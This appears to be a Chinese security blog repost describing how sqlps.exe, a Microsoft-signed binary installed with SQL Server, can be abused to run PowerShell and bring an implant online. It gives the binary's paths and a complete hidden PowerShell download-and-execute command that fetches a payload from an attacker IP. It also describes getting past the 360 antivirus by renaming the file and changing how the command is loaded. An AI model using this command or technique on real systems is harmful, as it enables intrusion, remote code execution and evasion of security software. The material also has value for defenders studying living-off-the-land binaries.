sqlse 白名单运用

admin 2022年12月22日13:36:19评论21 views字数 1069阅读3分33秒阅读模式

环境 win10

mssql:2017

环境安装

参考:https://mp.weixin.qq.com/s?__biz=MzA4MjU4MTg2Ng==&mid=2247488389&idx=2&sn=2258bac044b8bae614afced1fb582d1e&chksm=9f82d380a8f55a96ab3ace7ed5df392e89e8338eec4d15dd2b34f8ba5bbdf67dc31bdddd59d0&scene=21#wechat_redirect

sqlps 介绍

sqlps 是 mssql 安装后附带的一个具有 Microsoft 签名的二进制文件,可以用来加载一些命令,直接执行会发现是 powershell

sqlse 白名单运用
sqlse 白名单运用

文件位置位于:

路径:

  • C:Program files (x86)Microsoft SQL Server100ToolsBinnsqlps.exe
  • C:Program files (x86)Microsoft SQL Server110ToolsBinnsqlps.exe
  • C:Program files (x86)Microsoft SQL Server120ToolsBinnsqlps.exe
  • C:Program files (x86)Microsoft SQL Server130ToolsBinnsqlps.exe
  • C:Program Files (x86)Microsoft SQL Server150ToolsBinnSQLPS.exe

Microsoft SQL Server100 和 110 是 Powershell v2。Microsoft SQL Server120 和 130 是 Powershell 版本 4。在 SQL Server 2016 中被 SQLToolsPS.exe 取代,但出于兼容性原因将包含在安装中。

此文件没有依赖 可以单独提出来在没有 sql server 的机器里面运行

利用此文件来进行上线

直接执行:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.150.127.128:80/a'))"

sqlse 白名单运用

然后用 sqlps 执行

sqlse 白名单运用
sqlse 白名单运用
sqlse 白名单运用

360:

sqlse 白名单运用
sqlse 白名单运用

进行绕过

sqlse 白名单运用
sqlse 白名单运用

这里是换了一种加载 powershell 命令的方式和重命名了 sqlps 文件来进行的绕过方式肯定很多 就不一一列举了

参考:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/#execute

原文始发于微信公众号(海狮安全团队):sqlse 白名单运用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月22日13:36:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sqlse 白名单运用http://cn-sec.com/archives/1472633.html

发表评论

匿名网友 填写信息